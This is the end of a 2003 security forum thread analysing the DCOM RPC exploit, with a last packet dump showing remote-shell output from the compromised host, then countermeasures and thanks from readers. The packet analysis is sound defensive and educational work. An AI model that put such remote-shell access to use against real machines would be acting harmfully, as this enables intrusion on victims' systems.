10:43:07.378464 IP (tos 0x0, ttl 128, id 463, len 104) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 84682:84734(52) ack 16 win 17505 <nop,nop,timestamp 3283 54228> (DF)
0x0000    4500 0068 01cf 4000 8006 729a c0a8 0265   E..h..@...r....e
0x0010    c0a8 0271 115c 8006 f3b3 788f 125b 4a60   ...q.\....x..[J`
0x0020    8018 4461 dc47 0000 0101 080a 0000 0cd3   ..Da.G..........
0x0030    0000 d3d4 2020 2020 2020 2020 2020 2020   ................
0x0040    2020 2034 2044 6972 2873 2920 2020 322c   ...4.Dir(s)...2,
0x0050    3639 372c 3038 342c 3932 3820 6279 7465   697,084,928.byte
0x0060    7320 6672 6565 0d0a                       s.free..

At this point you could either continue manipulating the victim machine or pretty much do whatever you desired. This however is where the packet trace ends for analysis purposes, as both the start of the exploit, and victim manipulation have been shown.

Exploit countermeasures

The first would be to install the patch from Mircosoft. Symantec has them nicely listed here. Another method would be to simply disable the DCOM service itself. There is a step by step method here on how to disable it. Lastly as well it should be noted that as a home user you should bebehind a firewall at the least as well. Some free firewalls are zonealarm, as well as TPF by Kerio, and Agnitum Outpost. Of the three I would recommend either TPF or Outpost.

We hope that you found this helpful in gaining an understanding of how the exploit itself works. Should you have any suggestions on how to improve this please let me know. Also if there are parts that you do not understand please let us know, and we will attempt to clarify.


Last edited by alt.don on Thu Aug 14, 2003 4:49 pm; edited 2 times in total
Back to top
View user's profile Send private message Visit poster's website
cIx
Just Arrived
Just Arrived


Joined: 14 Jul 2003
Posts: 0
Location: /dev/null

Offline

PostPosted: Wed Aug 06, 2003 7:05 pm    Post subject: Reply with quote

very nice overview.... thanks for sharing.
Back to top
View user's profile Send private message Send e-mail Visit poster's website
tutaepaki
Trusted SF Member
Trusted SF Member


Joined: 02 May 2002
Posts: 3
Location: New Zealand

Offline

PostPosted: Wed Aug 06, 2003 10:38 pm    Post subject: Reply with quote

Thanks Don...good description.

Just to be picky Wink Isnt it KPF from Kerio ? not TPF. TPF still exists as a separate chargeable product.
Back to top
View user's profile Send private message
expl01t
Just Arrived
Just Arrived


Joined: 13 Sep 2003
Posts: 0
Location: China

Offline

PostPosted: Sat Sep 13, 2003 9:18 am    Post subject: Reply with quote

Good,So smart~~
Back to top
View user's profile Send private message Visit poster's website
packet
Just Arrived
Just Arrived


Joined: 20 Oct 2003
Posts: 1
Location: Minnesota, USA

Offline

PostPosted: Mon Oct 20, 2003 6:17 pm    Post subject: Reply with quote

Nice, I like the packet level analysis with the packet by packet blow by blow format. Great for us packet jockies.

--P>G>>
Back to top
View user's profile Send private message
ack
Just Arrived
Just Arrived


Joined: 27 Apr 2005
Posts: 0


Offline

PostPosted: Sat May 07, 2005 10:04 am    Post subject: Reply with quote

perfect! Very Happy
very nice description!
Back to top
View user's profile Send private message Send e-mail Visit poster's website AIM Address
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register